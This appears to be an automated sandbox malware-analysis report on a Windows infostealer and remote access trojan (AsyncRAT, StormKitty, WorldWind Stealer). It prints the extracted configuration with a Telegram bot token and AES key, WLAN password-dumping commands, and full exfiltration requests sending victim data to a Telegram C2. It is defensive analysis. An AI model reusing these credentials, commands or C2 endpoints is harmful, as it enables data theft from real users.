Windows Analysis Report
vYz1Z2heor.exe

Overview

General Information

Sample name: vYz1Z2heor.exe (renamed because the original name is a hash value)
Original sample name: 7f1630df6b57af024a3b561bdadc208f.exe
Analysis ID: 1495519
MD5: 7f1630df6b57af024a3b561bdadc208f
SHA1: 9b304cb2eff05f040b76eccc00ee55b914cf1839
SHA256: c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7
Tags: exe

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious desktop.ini Action
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • vYz1Z2heor.exe (PID: 8020 cmdline: "C:\Users\user\Desktop\vYz1Z2heor.exe" MD5: 7F1630DF6B57AF024A3B561BDADC208F)
    • cmd.exe (PID: 7288 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7432 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7484 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7504 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7620 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7772 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7820 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"C2 url": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage"}
{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "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", "ServerSignature": "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", "Group": "Default"}
Source | Rule | Description | Author | Strings
vYz1Z2heor.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |
vYz1Z2heor.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
vYz1Z2heor.exe | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security |
vYz1Z2heor.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
vYz1Z2heor.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings
00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security |
00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen | 0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source | Rule | Description | Author | Strings
0.0.vYz1Z2heor.exe.c0000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
0.0.vYz1Z2heor.exe.c0000.0.unpack | JoeSecurity_StormKitty | Yara detected StormKitty Stealer | Joe Security |
0.0.vYz1Z2heor.exe.c0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.0.vYz1Z2heor.exe.c0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.vYz1Z2heor.exe.c0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

System Summary

Source: File created | Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) | Data: EventID: 11, Image: C:\Users\user\Desktop\vYz1Z2heor.exe, ProcessId: 8020, TargetFilename: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\vYz1Z2heor.exe", ParentImage: C:\Users\user\Desktop\vYz1Z2heor.exe, ParentProcessId: 8020, ParentProcessName: vYz1Z2heor.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7288, ProcessName: cmd.exe

Suricata alerts:
Timestamp: 2024-08-20T11:06:31.130632+0200 | SID: 2044766 | Severity: 1 | Source Port: 49703 | Destination Port: 443 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-08-20T11:06:32.063374+0200 | SID: 2803305 | Severity: 3 | Source Port: 49704 | Destination Port: 443 | Protocol: TCP | Classtype: Unknown Traffic

AV Detection

Source: vYz1Z2heor.exe | Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "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", "ServerSignature": "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", "Group": "Default"}
Source: vYz1Z2heor.exe.8020.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage"}
Source: vYz1Z2heor.exe | Virustotal: Detection: 71%
Source: vYz1Z2heor.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: vYz1Z2heor.exe | Joe Sandbox ML: detected
Source: vYz1Z2heor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: vYz1Z2heor.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb | source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb | source: Temp.txt.0.dr
Source: Binary string: winload_prod.pdb\ | source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb\ | source: Temp.txt.0.dr

Networking

Source: Network traffic | Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.10:49703 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.10:49703 -> 149.154.167.220:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match | File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 | Host: api.mylnikov.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 | Host: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 HTTP/1.1 | Content-Type: multipart/form-data; boundary="e35d3d9c-f92c-4c5d-add6-08cfbcb74510" | Host: api.telegram.org | Content-Length: 119649 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 | Content-Type: multipart/form-data; boundary="e245ce92-0133-448a-9d84-72d663372986" | Host: api.telegram.org | Content-Length: 119649 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | IP Address: 104.16.185.241
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: icanhazip.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49704 -> 149.154.167.220:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 157.184.7.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
Source: global traffic | DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: pastebin.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match | File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
Source: vYz1Z2heor.exe, DesktopScreenshot.cs | .Net Code: Make
Source: vYz1Z2heor.exe, Keylogger.cs | .Net Code: SetHook
Source: vYz1Z2heor.exe, Keylogger.cs | .Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH.docx
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\KLIZUSIQEN.jpg
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PALRGUCVEH\PALRGUCVEH.docx
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW\ZGGKNSUKOP.xlsx
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File deleted: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KLIZUSIQEN.jpg

System Summary

Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers Author: ditekSHen
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers Author: ditekSHen
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_00C16390
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_00C15AC0
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_00C19750
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_00C19760
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_00C15778
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_051805FF
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_05180600
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_0518C108
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_0518C0F7
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_05185D52
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Code function: 0_2_05185D60
Source: vYz1Z2heor.exe, 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs vYz1Z2heor.exe
Source: vYz1Z2heor.exe, 00000000.00000002.3833157205.000000000076E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs vYz1Z2heor.exe
Source: vYz1Z2heor.exe | Binary or memory string: OriginalFilenameClient.exe. vs vYz1Z2heor.exe
Source: vYz1Z2heor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: vYz1Z2heor.exe, type: SAMPLE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: vYz1Z2heor.exe, Settings.cs | Base64 encoded string: 'gBmV+whOrLlDPT9N2FSFqQpklRcUZE/jivCRYYgMWWAxUB8exETKRP1QK7tgkWpQk6gfLoFNVfIfik5seKTZL6hRGe78x5RkWQw4nwFp4M4hJDe/7fHZ7ZBCB35I9xYf', 'ZWv2msxGWSmsqKUeWdaEBE5VvTXro5SaBNnWzg+vESKEylana7WCibgZev9fqEu7ZzLUhTF6UJIoIoxnzbCyLA==', 'Z5pZYvRJIFTn8wlNIbceeqsxsKyiih9zS9G1Q49QpoEQOhv8FIVYhJy3JtaDzo7YHrinzRvWHLMY6KkdaCxT9w==', 'lv3eVVbrtyehpFQQS+O85pqbqHpE531GsoTORjAIVkmXnn29fizpHaeprUcfXfR7i1rDsUVnA0uHFazCOt353g==', 'vx/BE7jbRUB6mf7JvBe7Aqms5ens79dF75erQeF42sT5vvO+4N9X2zk0aqxqkuguWA/A06An2byEZbqi5N4oc6eDd74t2bt19gesw0UIL8c=', 'xYuvE6ES2q02iyx0gj+TcxpQsqddzdkIJrpkxnhqM1VY6AGnW9K7iueX76+kb51aZY1MQHOImE+WAxBe/9TWW8PghqnYJs+uiWFcbqIrt7wBNgYAZIb4fWIYK6I8PvG
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@17/90@6/5
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File created: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD5A3.tmp
Source: vYz1Z2heor.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vYz1Z2heor.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | File read: C:\Users\user\Pictures\desktop.ini
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tmpD656.tmp.dat.0.dr, tmpD5E2.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: vYz1Z2heor.exe | Virustotal: Detection: 71%
Source: vYz1Z2heor.exe | ReversingLabs: Detection: 86%
Source: vYz1Z2heor.exe | String found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
Source: unknown | Process created: C:\Users\user\Desktop\vYz1Z2heor.exe "C:\Users\user\Desktop\vYz1Z2heor.exe"
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\vYz1Z2heor.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
